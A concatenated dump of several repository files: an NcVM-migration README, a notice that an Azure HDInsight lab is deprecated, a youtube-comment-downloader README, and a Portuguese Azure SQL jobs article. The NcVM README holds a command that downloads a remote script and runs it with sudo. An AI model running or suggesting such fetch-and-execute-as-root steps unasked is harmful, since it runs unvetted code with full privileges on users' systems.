[ "MIT" ]
null
null
null
# NcVM-migration
A shell script for migrating the [NcVM](https://github.com/nextcloud/vm) between different Ubuntu versions.

**Please note:** You are free to run this script at your own risk. I am not responsible for any damaged systems and will not provide any personal support, so please keep backups!

## How to run?
Connect to your NcVM via SSH and run:

`wget https://raw.githubusercontent.com/szaimen/NcVM-migration/master/migration.sh && sudo bash migration.sh`

That's it!

## How does it work?
- The whole backup-restore functionality is based on the great scripts provided by DecaTec; please see here: https://codeberg.org/DecaTec/Nextcloud-Backup-Restore
- The migration.sh script automatically produces the backup files and a restore.sh script, which can be called from the new NcVM after running the startup script. It restores all Nextcloud-relevant files and data (the database, the data directory, and the Nextcloud folder) to the new NcVM.
- In the last step of the restore.sh script, you are asked whether you want to activate TLS on the new server, which is the only step left to make the new server work again.
- After that, you can simply execute the scripts provided by the NcVM again to get additional apps working.

## In a nutshell
1. Create a backup of your NcVM
2. Mount an SMB share to your NcVM using the built-in smbmount script by running<br/>`sudo bash /var/scripts/menu.sh` -> `Additional Apps` -> `SMB-mount`
3. [Execute](#how-to-run) the migration.sh script
4. [Download](https://www.hanssonit.se/nextcloud-vm/) a new NcVM
5. Import and start the new NcVM and run the startup script
6. Mount the same SMB share to the new NcVM using the built-in smbmount script again (see point 2)
7. Execute the restore.sh script produced by the migration.sh script on the new NcVM
8. Log in to the restored Nextcloud using the local IP address of the new NcVM in a browser and test that everything works as expected<br/>(e.g. check the Nextcloud logs, test all installed Nextcloud apps, etc.)
9. If yes, enable Let's Encrypt by running `sudo bash /var/scripts/menu.sh` -> choose `Server Configuration` -> choose `Activate TLS`
10. If needed, manually restore crontab entries, fstab entries, etc.
11. Reinstall NcVM apps by running `sudo bash /var/scripts/menu.sh` -> `Additional Apps`
12. This should be it 🎉

## Limitations
- You have to connect an SMB mount by executing the smbmount script provided by the NcVM before running both scripts (migration.sh and restore.sh), since you need to store the backup files outside of the NcVM to be able to restore them to a new NcVM afterwards.
- If you have mounted and used SMB mounts in the NcVM before, you need to restore them manually in the correct order at the correct mountpoint before executing the restore.sh script.
- The migration.sh script only works on NcVM-based machines with Ubuntu 18.04 and PHP 7.2, and the restore.sh script only works on NcVM-based machines with Ubuntu 20.04 and PHP 7.4.
- Only the default NcVM configuration is supported.
- At least Nextcloud 18 is needed to run the migration.sh script.
- Apps that are provided by the NcVM and were installed on your old system will not be automatically installed by the restore.sh script, since they can easily be reinstalled by running the scripts provided by the NcVM.
- Backup of official Bitwarden is not supported.
- Non-standard customization on the old NcVM will not get backed up and restored, and has to be manually redone on the new NcVM after restoring.
- The crontabs are saved in a no-restore folder. They are backed up there so that you can look at them to better remember which cronjobs were running on your old system. You need to manually restore missing cronjobs, since that can't be automated.
- The update.sh file is backed up in this folder as well, since you could possibly have changed something in there, which has to be manually restored if needed.
- The fstab is also backed up in the no-restore folder so that you can see your old configuration, which is helpful e.g. to be able to manually restore the correct order of SMB mounts, etc.

## Bitwarden_rs
- If you have Bitwarden_rs running on your old NcVM, the migration.sh script will automatically back up all needed files and create a bitwarden-restore.sh script.

### Bitwarden-restore in a nutshell
1. Execute all steps of [In a nutshell](#in-a-nutshell)
2. Install Bitwarden_rs on the new NcVM by running `sudo bash /var/scripts/menu.sh` and choosing Additional Apps -> Bitwarden -> Bitwarden_rs, and enter during the installation the Bitwarden_rs domain of your old Bitwarden_rs installation
3. Execute bitwarden-restore.sh
4. That's it 🎉
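Since the restore depends on the backup artifacts being present on the SMB share, a quick pre-flight check before running restore.sh can save a failed half-restore. The sketch below is a hedged illustration only: the artifact file names are hypothetical placeholders, not the names migration.sh actually writes.

```python
from pathlib import Path
import tempfile

# Hypothetical artifact names -- adjust to whatever migration.sh actually produced.
REQUIRED = ["restore.sh", "nextcloud-db.sql", "nextcloud-dir.tar.gz"]

def missing_artifacts(backup_dir, required=REQUIRED):
    """Return the names from `required` that are absent from backup_dir."""
    base = Path(backup_dir)
    return [name for name in required if not (base / name).exists()]

# Quick demonstration against a temporary directory with only one artifact present
with tempfile.TemporaryDirectory() as tmp:
    Path(tmp, "restore.sh").touch()
    gone = missing_artifacts(tmp)

assert "restore.sh" not in gone
assert "nextcloud-db.sql" in gone
```

In practice you would point `missing_artifacts` at the SMB mountpoint and refuse to start the restore while the returned list is non-empty.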
89.942308
295
0.77956
eng_Latn
0.999318
6f481c9b7e32067b56d81b836becfebf81c1fe6e
597
md
Markdown
Labs/Big Data and Analytics/Hadoop on Azure HDInsight/HDInsight Hadoop HOL.md
365Academic/AcademicContent
8f35d9bb8a7c9054a134f6c69bf125e64be8f7f2
[ "MIT" ]
615
2020-03-26T18:21:33.000Z
2022-03-31T23:58:18.000Z
Labs/Big Data and Analytics/Hadoop on Azure HDInsight/HDInsight Hadoop HOL.md
365Academic/AcademicContent
8f35d9bb8a7c9054a134f6c69bf125e64be8f7f2
[ "MIT" ]
34
2020-03-27T00:03:03.000Z
2022-02-27T10:18:05.000Z
Labs/Big Data and Analytics/Hadoop on Azure HDInsight/HDInsight Hadoop HOL.md
365Academic/AcademicContent
8f35d9bb8a7c9054a134f6c69bf125e64be8f7f2
[ "MIT" ]
213
2020-03-25T22:32:53.000Z
2022-03-24T05:29:58.000Z
# Processing Big Data with Apache Hadoop on Azure HDInsight

This lab has been deprecated and replaced by a lab on [Microsoft Learn](https://docs.microsoft.com/learn?WT.mc_id=academic-9938-jabenn), our hands-on, self-guided learning platform:

[Building Open Source Software (OSS) Analytics Solutions with Azure HDInsight](https://docs.microsoft.com/learn/paths/build-oss-analytical-solutions-az-hdinsight//?WT.mc_id=academic-9938-jabenn)

![Learn module logo](https://docs.microsoft.com/learn/achievements/building-oss-analytical-solutions-with-azure-hdinsight.svg?WT.mc_id=academic-9938-jabenn)
74.625
194
0.805695
eng_Latn
0.52917
6f4988f850eaf93e56b6ad664320fe3b619c7184
897
md
Markdown
README.md
Koomook/youtube-comment-downloader
50ba014fcf368f27b7551a0b898ff20c811a370c
[ "MIT" ]
5
2021-05-09T12:51:32.000Z
2021-11-04T11:02:54.000Z
README.md
Koomook/youtube-comment-downloader
50ba014fcf368f27b7551a0b898ff20c811a370c
[ "MIT" ]
null
null
null
README.md
Koomook/youtube-comment-downloader
50ba014fcf368f27b7551a0b898ff20c811a370c
[ "MIT" ]
3
2021-05-12T12:14:05.000Z
2021-10-06T05:19:54.000Z
# youtube-comment-downloader

Simple script for downloading Youtube comments without using the Youtube API. The output is in line delimited JSON.

### Dependencies

* Python 2.7+
* requests
* lxml
* cssselect

The python packages can be installed with

    pip install requests
    pip install lxml
    pip install cssselect

### Usage

```
usage: downloader.py [--help] [--youtubeid YOUTUBEID] [--output OUTPUT]

Download Youtube comments without using the Youtube API

optional arguments:
  --help, -h            Show this help message and exit
  --youtubeid YOUTUBEID, -y YOUTUBEID
                        ID of Youtube video for which to download the comments
  --output OUTPUT, -o OUTPUT
                        Output filename (output format is line delimited JSON)
```

For Youtube IDs starting with - (dash) you will need to run the script with: `-y=-idwithdash` or `--youtubeid=-idwithdash`
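The output format is line delimited JSON: one JSON object per line, which makes the file easy to stream and append to. A minimal sketch of producing and consuming that format (the `cid`/`text` field names are illustrative, not a guarantee of what the downloader emits):

```python
import io
import json

def dump_comments(records, fp):
    """Write one JSON object per line (line delimited JSON)."""
    for rec in records:
        fp.write(json.dumps(rec) + "\n")

def load_comments(fp):
    """Parse a line-delimited JSON stream back into a list of dicts."""
    return [json.loads(line) for line in fp if line.strip()]

# Round-trip through an in-memory buffer instead of a real output file
buf = io.StringIO()
dump_comments([{"cid": "1", "text": "first"}, {"cid": "2", "text": "second"}], buf)
buf.seek(0)
comments = load_comments(buf)
assert [c["cid"] for c in comments] == ["1", "2"]
```

Because each line is independent, you can process a huge comment dump with a plain `for line in open(filename)` loop without loading the whole file into memory.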
28.03125
115
0.697882
eng_Latn
0.963675
6f499d7f5d8f3624bb7b19f40d85b490343eddbd
24,284
md
Markdown
articles/sql-database/sql-database-job-automation-overview.md
ialeksander1/azure-docs.pt-br
d5a7a2c2d4a31282f49bd1e35036cb1939911974
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/sql-database/sql-database-job-automation-overview.md
ialeksander1/azure-docs.pt-br
d5a7a2c2d4a31282f49bd1e35036cb1939911974
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/sql-database/sql-database-job-automation-overview.md
ialeksander1/azure-docs.pt-br
d5a7a2c2d4a31282f49bd1e35036cb1939911974
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Automação de trabalho description: Usar a Automação de Trabalhos para executar scripts T-SQL (Transact-SQL) em um conjunto de um ou mais bancos de dados SQL do Azure services: sql-database ms.service: sql-database ms.custom: '' ms.devlang: '' ms.topic: overview author: jovanpop-msft ms.author: jovanpop ms.reviewer: carlr ms.date: 03/10/2020 ms.openlocfilehash: dcaaf3c2f793e7148e1695cdfaa68c768db5fff6 ms.sourcegitcommit: c2065e6f0ee0919d36554116432241760de43ec8 ms.translationtype: HT ms.contentlocale: pt-BR ms.lasthandoff: 03/26/2020 ms.locfileid: "79215454" --- # <a name="automate-management-tasks-using-database-jobs"></a>Automatizar tarefas de gerenciamento usando trabalhos de banco de dados O Banco de Dados SQL do Azure permite que você crie e agende trabalhos que podem ser executados periodicamente em um ou vários bancos de dados para executar consultas T-SQL e executar tarefas de manutenção. Cada trabalho registrará o status de execução e também repetirá as operações se ocorrer uma falha. É possível definir o banco de dados de destino ou grupos de bancos de dados SQL do Azure em que o trabalho será executado e também definir agendas para executar um trabalho. Um trabalho lida com a tarefa de fazer logon no banco de dados de destino. Você também define, atualiza e mantém os scripts T-SQL a serem executados em um grupo de bancos de dados SQL do Azure. ## <a name="when-to-use-automated-jobs"></a>Quando usar trabalhos automatizados Há vários cenários, quando você pode usar a automação de trabalhos: - Automatizar tarefas de gerenciamento e, em seguida, agendá-las para serem executadas a todo dia da semana, após horas etc. - Implantar alterações de esquema, gerenciamento de credenciais, coleta de dados de desempenho ou coleta de telemetria do locatário (cliente). - Atualizar dados de referência (informações comuns a todos os bancos de dados), carregar dados do armazenamento de blobs do Azure. - Recompilar índices para melhorar o desempenho da consulta. 
Configure trabalhos para serem executados em um conjunto de bancos de dados de modo recorrente, por exemplo, fora dos horários de pico. - Coletar resultados de consulta de um conjunto de bancos de dados em uma tabela central em uma base contínua. Consultas de desempenho podem ser executadas continuamente e configuradas para disparar tarefas adicionais a serem executadas. - Coletar dados para relatórios - Agregue dados de uma coleção de bancos de dados SQL do Azure em uma tabela de destino único. - Executar consultas de processamento de dados mais longas em um grande conjunto de bancos de dados, por exemplo, a coleta de telemetria do cliente. Resultados são coletados em uma única tabela de destino para análise posterior. - Movimentações de dados - Crie trabalhos que replicam as alterações feitas em seus bancos de dados para outros bancos de dados ou colete atualizações feitas em bancos de dados remotos e aplique o que foi alterado no banco de dados. - Crie trabalhos que carregam dados de ou para seus bancos de dados usando o SSIS (SQL Server Integration Services). ## <a name="overview"></a>Visão geral As tecnologias de agendamento de trabalhos a seguir estão disponíveis no Banco de Dados SQL do Azure: - Os **Trabalhos do SQL Agent** são um componente de agendamento de trabalho do SQL Server clássico e eficaz disponível na Instância Gerenciada. Os Trabalhos do SQL Agent não estão disponíveis em bancos de dados individuais linguagem SQL do Azure. - Os **Trabalhos de banco de dados elástico (versão prévia)** são os serviços de Agendamento de Trabalhos que executam trabalhos personalizados em um ou muitos Bancos de Dados SQL do Azure. Vale a pena observar algumas diferenças entre o SQL Agent (disponível localmente e como parte da Instância Gerenciada do Banco de Dados SQL) e o agente Trabalho Elástico do Banco de Dados (disponível para bancos de dados individuais no Banco de Dados SQL do Azure e para bancos de dados no SQL Data Warehouse). 
| |Trabalhos elásticos |SQL Agent | |---------|---------|---------| |Escopo | Qualquer número de bancos de dados SQL do Azure e/ou data warehouses na mesma nuvem do Azure do agente de trabalho. Os destinos podem estar em diferentes servidores, assinaturas e/ou regiões do Banco de Dados SQL. <br><br>Os grupos de destino podem ser compostos de bancos de dados ou data warehouses individuais ou dos bancos de dados em um servidor, pool ou mapa de fragmentos (enumerados dinamicamente no runtime do trabalho). | Qualquer banco de dados individual na mesma instância do SQL Server que o SQL Agent. | |Ferramentas e APIs com suporte | Portal, PowerShell, T-SQL, Azure Resource Manager | T-SQL, SSMS (SQL Server Management Studio) | ## <a name="sql-agent-jobs"></a>Trabalhos do SQL Agent Os trabalhos do SQL Agent são uma série especificada de scripts T-SQL com relação ao seu banco de dados. Use trabalhos para definir uma tarefa administrativa que pode ser executada uma ou mais vezes e monitorada quanto a êxito ou falha. Um trabalho pode ser executado em um servidor local ou em vários servidores remotos. Os Trabalhos do SQL Agent são um componente interno do Mecanismo de Banco de Dados executado dentro do serviço de Instância Gerenciada. Há vários conceitos importantes em Trabalhos do SQL Agent: - **Etapas de trabalho** conjunto de uma ou mais etapas que devem ser executadas dentro do trabalho. Para cada etapa de trabalho, é possível definir a estratégia de repetição e a ação que deverá acontecer se a etapa de trabalho tiver êxito ou falhar. - **Agendas** definem quando o trabalho deve ser executado. - **Notificações** permitem que você defina regras que serão usadas para notificar operadores por email após a conclusão do trabalho. ### <a name="job-steps"></a>Etapas de trabalho As etapas do Trabalho do SQL Agent são sequências de ações que o SQL Agent deve executar. 
Cada etapa tem a seguinte etapa que deverá ser executada se a etapa tiver êxito ou falhar, número de repetições em caso de falha. O SQL Agent permite que você crie diferentes tipos das etapas de trabalho, como a etapa de trabalho Transact-SQL que executa um único lote do Transact-SQL com relação ao banco de dados ou as etapas comando/PowerShell do sistema operacional que podem executar um script personalizado do sistema operacional; as etapas de trabalho do SSIS permitem que você carregue dados usando o runtime do SSIS ou as etapas de [replicação](sql-database-managed-instance-transactional-replication.md) que podem publicar alterações do seu banco de dados em outros. [Replicação transacional](sql-database-managed-instance-transactional-replication.md) é um recurso do Mecanismo de Banco de Dados que permite que você publique as alterações feitas em uma ou várias tabelas em um banco de dados e publique/distribua-as a um conjunto de bancos de dados do assinante. A publicação das alterações é implementada usando os seguintes tipos de etapa de trabalho do SQL Agent: - Leitor do log de transações. - Instantâneo. - Distribuidor. Outros tipos de etapas de trabalho não têm suporte no momento, incluindo: - Não há suporte para a etapa de trabalho de replicação de mesclagem. - Não há suporte para leitor de fila. - O Analysis Services não é suportado ### <a name="job-schedules"></a>Agendas de trabalho Uma agenda especifica quando um trabalho é executado. Mais de um trabalho pode ser executado na mesma agenda e mais de uma agenda pode ser aplicada ao mesmo trabalho. Uma agenda pode definir as condições a seguir para a hora em que um trabalho é executado: - Sempre que uma instância é reiniciada (ou quando o SQL Server Agent é iniciado). O trabalho é ativado após cada failover. - Uma vez, em uma data e hora específicas, que é útil para a execução atrasada de algum trabalho. - Em uma agenda recorrente. 
> [!Note] > No momento, a Instância Gerenciada não permite que você inicie um trabalho quando a instância estiver “ociosa”. ### <a name="job-notifications"></a>Notificações de trabalho Os trabalhos do SQL Agent permitem que você receba notificações quando o trabalho é concluído com êxito ou com falha. É possível receber a notificações por email. Primeiro, você precisaria configurar a conta de email que será usada para enviar as notificações por email e atribuir a conta ao perfil do email chamado `AzureManagedInstance_dbmail_profile`, conforme mostrado no exemplo a seguir: ```sql -- Create a Database Mail account EXECUTE msdb.dbo.sysmail_add_account_sp @account_name = 'SQL Agent Account', @description = 'Mail account for Azure SQL Managed Instance SQL Agent system.', @email_address = '$(loginEmail)', @display_name = 'SQL Agent Account', @mailserver_name = '$(mailserver)' , @username = '$(loginEmail)' , @password = '$(password)' -- Create a Database Mail profile EXECUTE msdb.dbo.sysmail_add_profile_sp @profile_name = 'AzureManagedInstance_dbmail_profile', @description = 'E-mail profile used for messages sent by Managed Instance SQL Agent.' ; -- Add the account to the profile EXECUTE msdb.dbo.sysmail_add_profileaccount_sp @profile_name = 'AzureManagedInstance_dbmail_profile', @account_name = 'SQL Agent Account', @sequence_number = 1; ``` Você também precisaria habilitar o Database Mail na Instância Gerenciada: ```sql GO EXEC sp_configure 'show advanced options', 1; GO RECONFIGURE; GO EXEC sp_configure 'Database Mail XPs', 1; GO RECONFIGURE ``` É possível notificar o operador de que algo aconteceu com seus trabalhos do SQL Agent. Um operador define informações de contato para um indivíduo responsável pela manutenção de uma ou mais Instâncias Gerenciadas. Algumas vezes, as responsabilidades do operador são atribuídas a um indivíduo. Em sistemas com várias Instâncias Gerenciadas ou SQL Servers, muitos indivíduos podem compartilhar as responsabilidades do operador. 
Um operador não contém informações de segurança nem define uma entidade de segurança. É possível criar operadores usando o SSMS ou o script Transact-SQL mostrado no exemplo a seguir: ```sql EXEC msdb.dbo.sp_add_operator @name=N'Mihajlo Pupun', @enabled=1, @email_address=N'mihajlo.pupin@contoso.com' ``` É possível modificar qualquer trabalho e atribuir operadores que serão notificado por email se o trabalho for concluído, falhar ou tiver êxito usando o SSMS ou o seguinte script Transact-SQL: ```sql EXEC msdb.dbo.sp_update_job @job_name=N'Load data using SSIS', @notify_level_email=3, -- Options are: 1 on succeed, 2 on failure, 3 on complete @notify_email_operator_name=N'Mihajlo Pupun' ``` ### <a name="sql-agent-job-limitations"></a>Limitações de trabalho do SQL Agent Alguns recursos do SQL Agent disponíveis no SQL Server não são compatíveis com a Instância Gerenciada: - As configurações do agente SQL são somente leitura. O procedimento `sp_set_agent_properties` não tem suporte na Instância Gerenciada. - No momento, não há suporte para habilitar/desabilitar o SQL Agent na Instância Gerenciada. O SQL Agent sempre está em execução. - As notificações são parcialmente suportadas - Não há suporte para pager. - Não há suporte a NetSend. - Não há suporte para alertas. - Não há suporte para proxies. - Não há suporte para Eventlog. Para obter informações sobre o SQL Server Agent, consulte [SQL Server Agent](https://docs.microsoft.com/sql/ssms/agent/sql-server-agent). ## <a name="elastic-database-jobs-preview"></a>Trabalhos de Banco de Dados Elástico (versão prévia) Os **Trabalhos de Banco de Dados Elástico** permitem executar um ou mais scripts T-SQL em paralelo, em um grande número de bancos de dados, seja com agendamento ou sob demanda. 
**Execute trabalhos em qualquer combinação de bancos de dados**: um ou mais bancos de dados individuais, todos os bancos de dados em um servidor, todos os bancos de dados em um pool elástico ou mapa de fragmentos, com a flexibilidade extra de poder incluir ou excluir qualquer banco de dados. **Os trabalhos podem ser executados em diversos servidores e pools, até mesmo em bancos de dados presentes em assinaturas diferentes.** Os servidores e pools são enumerados dinamicamente no runtime e, portanto, os trabalhos são executados em todos os bancos de dados existentes no grupo de destino no momento da execução. A imagem a seguir mostra um agente de trabalho executando trabalhos em diferentes tipos de grupos de destino: ![Modelo conceitual do agente de Trabalho Elástico](media/elastic-jobs-overview/conceptual-diagram.png) ### <a name="elastic-job-components"></a>Componentes do Trabalho Elástico |Componente | Descrição (confira mais detalhes abaixo da tabela) | |---------|---------| |[**Agente de Trabalho Elástico**](#elastic-job-agent) | O recurso do Azure que você cria para executar e gerenciar trabalhos. | |[**Banco de dados de trabalhos**](#job-database) | Um banco de dados SQL do Azure que o agente de trabalho usa para armazenar dados relacionados ao trabalho, definições de trabalho, etc. | |[**Grupo de destino**](#target-group) | O conjunto de servidores, pools, bancos de dados e mapas de fragmentos nos quais o trabalho é executado. | |[**Trabalho**](#job) | Um trabalho é uma unidade de trabalho composta de uma ou mais [etapas de trabalho](#job-step). As etapas de trabalho especificam qual script T-SQL deve ser executado, bem como outros detalhes necessários para a execução do script. | #### <a name="elastic-job-agent"></a>Agente de trabalho elástico Um agente de Trabalho Elástico é o recurso do Azure para criar, executar e gerenciar trabalhos. 
O agente de Trabalho Elástico é um recurso do Azure que você cria no portal (há suporte também para [PowerShell](elastic-jobs-powershell.md) e REST). A criação de um **agente de Trabalho Elástico** requer um banco de dados SQL já criado. O agente configura esse banco de dados existente como o [*Banco de dados do trabalho*](#job-database). O agente de Trabalho Elástico é gratuito. O banco de dados de trabalhos usa a mesma taxa de cobrança de qualquer banco de dados SQL. #### <a name="job-database"></a>Banco de dados de trabalhos O *banco de dados de trabalhos* é usado para definir os trabalhos e rastrear o status e o histórico das execuções de trabalho. O *Banco de dados de trabalhos* também é usado para armazenar metadados de agente, logs, resultados e definições de trabalho. Além disso, ele contém muitos procedimentos armazenados úteis e outros objetos de banco de dados usados para criar, executar e gerenciar trabalhos usando o T-SQL. Na versão prévia atual, um banco de dados existente SQL do Azure (S0 ou superior) é necessário para criar um agente de Trabalho Elástico. O *Banco de dados de trabalhos* não precisa ser literalmente novo, mas deve ser um objetivo de serviço limpo, vazio, S0 ou superior. O objetivo de serviço recomendado do *Banco de dados de trabalhos* é S1 ou superior, mas a opção ideal depende das necessidades de desempenho dos trabalhos: o número de etapas de trabalho, o número de destinos de trabalho e a frequência com que os trabalhos são executados. Por exemplo, um banco de dados S0 pode ser suficiente para um agente de trabalho que executa alguns trabalhos por hora direcionado a menos de dez bancos de dados, mas a execução de um trabalho por minuto pode não ser rápida o suficiente com um banco de dados S0, e uma camada de serviço superior pode ser melhor. 
Se as operações no banco de dados de trabalhos forem mais lentas do que o esperado, [monitore](sql-database-monitor-tune-overview.md#sql-database-resource-monitoring) o desempenho do banco de dados e a utilização de recursos no banco de dados de trabalhos durante períodos de lentidão usando o portal do Azure ou a DMV [sys.dm_db_resource_stats](https://docs.microsoft.com/sql/relational-databases/system-dynamic-management-views/sys-dm-db-resource-stats-azure-sql-database). Se a utilização de um recurso, como CPU, E/S de Dados ou Gravação de Log, se aproximar de 100% e se correlacionar com períodos de lentidão, considere a possibilidade de dimensionar de maneira incremental o banco de dados para objetivos de serviço superiores (no [modelo de DTU](sql-database-service-tiers-dtu.md) ou no [modelo de vCore](sql-database-service-tiers-vcore.md)) até que o desempenho do banco de dados de trabalhos seja suficientemente aprimorado. ##### <a name="job-database-permissions"></a>Permissões de banco de dados de trabalhos Durante a criação do agente de trabalho, um esquema, tabelas e uma função chamada *jobs_reader* são criados no *Banco de dados de trabalhos*. A função, projetada para oferecer aos administradores um controle de acesso mais rígido para monitoramento de trabalho, tem a seguinte permissão: |Nome da função |permissões de esquema 'jobs' |permissões de esquema 'jobs_internal' | |---------|---------|---------| |**jobs_reader** | SELECT | Nenhum | > [!IMPORTANT] > Considere as implicações de segurança antes de conceder acesso ao *banco de dados de trabalhos* como um administrador de banco de dados. Um usuário mal-intencionado com permissões para criar ou editar tarefas pode criar ou editar um trabalho que usa uma credencial armazenada para se conectar a um banco de dados sob controle do usuário mal-intencionado, o que permitiria que o usuário mal-intencionado determinasse a senha da credencial. 
#### <a name="target-group"></a>Grupo de destino Um *grupo de destino* define o conjunto de bancos de dados em que uma etapa de trabalho será executada. Um grupo de destino pode conter qualquer quantidade ou combinação dos seguintes itens: - **Servidor do Banco de Dados SQL**: se um servidor for especificado, todos os bancos de dados existentes no servidor no momento da execução do trabalho farão parte do grupo. A credencial de banco de dados mestre deve ser fornecida para que o grupo possa ser enumerado e atualizado antes da execução do trabalho. - **Pool elástico**: se um pool elástico for especificado, todos os bancos de dados presentes no pool elástico no momento da execução do trabalho farão parte do grupo. Assim como ocorre para servidores, a credencial de banco de dados mestre deve ser fornecida para que o grupo possa ser atualizado antes da execução do trabalho. - **Banco de dados único**: especifica um ou mais bancos de dados individuais como parte do grupo. - **Mapa de fragmentos**: bancos de dados de um mapa de fragmentos. > [!TIP] > No momento da execução do trabalho, a *enumeração dinâmica* reavalia o conjunto de bancos de dados em grupos de destino que incluem servidores ou grupos. A enumeração dinâmica garante que os **trabalhos serão executados em todos os bancos de dados existentes no servidor ou pool no momento da execução do trabalho**. A reavaliação da lista de bancos de dados no runtime é especialmente útil para cenários em que a associação de pools ou servidores é alterada com frequência. É possível incluir ou excluir pools e bancos de dados individuais do grupo. Isso permite a criação de um grupo de destino com qualquer combinação de bancos de dados. Por exemplo, você pode adicionar um servidor a um grupo de destino, mas excluir bancos de dados específicos em um pool elástico (ou excluir um pool inteiro). Um grupo de destino pode incluir bancos de dados em várias assinaturas e em várias regiões. 
Note that cross-region executions have higher latency than executions within the same region. The following examples show how different target group definitions are dynamically enumerated at job execution time to determine which databases the job runs on: ![Target group examples](media/elastic-jobs-overview/targetgroup-examples1.png) **Example 1** shows a target group that consists of a list of individual databases. When a job step is executed using this target group, the job step's action is executed on each of those databases.<br> **Example 2** shows a target group that contains an Azure SQL server as a target. When a job step is executed using this target group, the server is dynamically enumerated to determine the list of databases that are currently on the server. The job step's action is executed on each of those databases.<br> **Example 3** shows a target group similar to *Example 2*, but an individual database is specifically excluded. The job step's action is *not* executed on the excluded database.<br> **Example 4** shows a target group that contains an elastic pool as a target. Similar to *Example 2*, the pool is dynamically enumerated at job run time to determine the list of databases in the pool. <br><br> ![Target group examples](media/elastic-jobs-overview/targetgroup-examples2.png) **Example 5** and **Example 6** show advanced scenarios where Azure SQL servers, elastic pools, and databases can be combined using include and exclude rules.<br> **Example 7** shows that the shards in a shard map can also be evaluated at job run time. > [!NOTE] > The job database itself can be the target of a job. 
In this scenario, the job database is treated just like any other target database. The job user must be created and granted sufficient permissions in the job database, and the database-scoped credential for the job user must also exist in the job database, just as it does for any other target database. #### <a name="job"></a>Job A *job* is a unit of work that is executed on a schedule or as a one-time job. A job consists of one or more *job steps*. ##### <a name="job-step"></a>Job step Each job step specifies a T-SQL script to execute, one or more target groups to run the T-SQL script against, and the credentials the job agent needs to connect to the target database. Each job step has customizable timeout and retry policies, and can optionally specify output parameters. #### <a name="job-output"></a>Job output The outcome of a job's steps on each target database is recorded in detail, and script output can be captured to a specified table. You can specify a database to save any data returned from a job. #### <a name="job-history"></a>Job history Job execution history is stored in the *job database*. A system cleanup job purges execution history older than 45 days. To remove history less than 45 days old, call the **sp_purge_history** stored procedure in the *job database*. ### <a name="agent-performance-capacity-and-limitations"></a>Agent performance, capacity, and limitations Elastic Jobs use minimal compute resources while waiting for long-running jobs to complete. 
Depending on the size of the target group of databases and the desired execution time for a job (the number of concurrent jobs), the agent requires different amounts of compute and performance from the *job database* (the more targets and jobs, the higher the amount of compute required). Currently, the preview is limited to 100 concurrent jobs. #### <a name="prevent-jobs-from-reducing-target-database-performance"></a>Prevent jobs from reducing target database performance To ensure resources aren't overburdened when running jobs against databases in a SQL elastic pool, jobs can be configured to limit the number of databases a job can run against at the same time. ## <a name="next-steps"></a>Next steps - [What is SQL Server Agent](https://docs.microsoft.com/sql/ssms/agent/sql-server-agent) - [How to create and manage elastic jobs](elastic-jobs-overview.md) - [Create and manage elastic jobs using PowerShell](elastic-jobs-powershell.md) - [Create and manage elastic jobs using Transact-SQL (T-SQL)](elastic-jobs-tsql.md)
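The include/exclude semantics of target groups described above can be sketched in a few lines of Python. This is a hypothetical model of the resolution logic, not the actual agent implementation; the function and variable names are invented for illustration. Servers and pools expand to their current member databases at execution time (the "dynamic enumeration"), and exclusions are applied last:

```python
def resolve_target_group(members, server_dbs, pool_dbs):
    """Resolve a target group to concrete databases at job run time.

    members: list of (kind, name, excluded) tuples, where kind is
             'server', 'pool', or 'db'.
    server_dbs / pool_dbs: current membership maps, looked up at
             execution time (this models the dynamic enumeration).
    """
    included, excluded = set(), set()
    for kind, name, is_excluded in members:
        if kind == "server":
            dbs = set(server_dbs.get(name, []))
        elif kind == "pool":
            dbs = set(pool_dbs.get(name, []))
        else:  # individual database
            dbs = {name}
        (excluded if is_excluded else included).update(dbs)
    # Exclusions win over inclusions, as in Example 3 above.
    return included - excluded


# Example: target a whole server but exclude one database on it.
servers = {"server1": ["db1", "db2", "pooldb1"]}
pools = {"pool1": ["pooldb1"]}
group = [("server", "server1", False), ("db", "db2", True)]
print(sorted(resolve_target_group(group, servers, pools)))  # ['db1', 'pooldb1']
```

Because the membership maps are consulted only when the function runs, a database added to `server1` between job executions is automatically picked up on the next run.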
83.737931
935
0.786608
por_Latn
0.99995
6f49e019cfbd95bf631da70e4ef208e860a1136d
1,956
md
Markdown
powerapps-docs/maker/common-data-service/sharepoint-onedrive-onenote-intro.md
MakelaM/powerapps-docs.fi-fi
b3e51111a33011384d41249fed6fb2fa70c7b43e
[ "CC-BY-4.0", "MIT" ]
null
null
null
powerapps-docs/maker/common-data-service/sharepoint-onedrive-onenote-intro.md
MakelaM/powerapps-docs.fi-fi
b3e51111a33011384d41249fed6fb2fa70c7b43e
[ "CC-BY-4.0", "MIT" ]
null
null
null
powerapps-docs/maker/common-data-service/sharepoint-onedrive-onenote-intro.md
MakelaM/powerapps-docs.fi-fi
b3e51111a33011384d41249fed6fb2fa70c7b43e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 'SharePoint, OneNote, and OneDrive integration with Common Data Service | Microsoft Docs' description: Learn about integrating Office 365 services with Common Data Service. author: Mattp123 manager: kvivek ms.service: powerapps ms.component: cds ms.topic: conceptual ms.date: 08/02/2019 ms.author: matp search.audienceType: - maker search.app: - PowerApps - D365CE --- # <a name="sharepoint-onenote-and-onedrive-integration-with-common-data-service"></a>SharePoint, OneNote, and OneDrive integration with Common Data Service Common Data Service supports SharePoint, OneDrive, and OneNote integration. Integrating with these services requires that SharePoint integration is enabled. |Office 365 service |Description | More information | |---------|---------|---------| |SharePoint | App users can manage common document types, such as Word, Excel, PowerPoint, and OneNote documents, and create folders to store and seamlessly manage those documents from Common Data Service apps using SharePoint. | [Manage documents using SharePoint](/dynamics365/customer-engagement/admin/manage-documents-using-sharepoint) <br /> <br /> [Set up SharePoint integration](/dynamics365/customer-engagement/admin/set-up-sharepoint-integration) | |OneDrive for Business | App users can create and manage private documents that can be accessed from Common Data Service apps. | [Enable OneDrive for Business](/dynamics365/customer-engagement/admin/enable-onedrive-for-business) | |OneNote | App users can use OneNote to take and view notes on Common Data Service records. | [Set up OneNote integration](/dynamics365/customer-engagement/admin/set-up-onenote-integration-in-dynamics-365) |
69.857143
546
0.775562
fin_Latn
0.982593
6f4a87b7f5fe74f43c6e3b221d03ecdbeed6d748
2,462
md
Markdown
v3-1/rest-1/auth/order-list.md
superj80820/bitopro-offical-api-docs
